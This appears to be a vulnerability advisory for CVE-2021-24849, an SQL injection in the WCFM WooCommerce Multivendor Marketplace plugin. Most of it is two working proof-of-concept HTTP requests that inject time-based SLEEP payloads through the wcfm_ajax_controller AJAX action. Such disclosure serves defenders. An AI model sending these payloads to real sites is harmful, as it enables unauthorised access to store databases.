WCFM – WooCommerce Multivendor Marketplace < 3.4.12 – Unauthenticated SQL Injection | CVE 2021-24849

Description

The wcfm_ajax_controller AJAX action of the plugin, available to unauthenticated and authenticated user, does not properly sanitise multiple parameters before using them in SQL statements, leading to SQL injections

Proof of Concept

v < 3.4.11

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: [any authenticated user]
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 109

action=wcfm_ajax_controller&controller=wcfm-refund-requests&transaction_id=1+union+select+1+and+sleep(10)--

v < 3.4.12

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: [any authenticated user]
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 145

action=wcfm_ajax_controller&controller=wcfm-refund-requests&transaction_id=1&orderby=ID`%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(5)))b)--%20`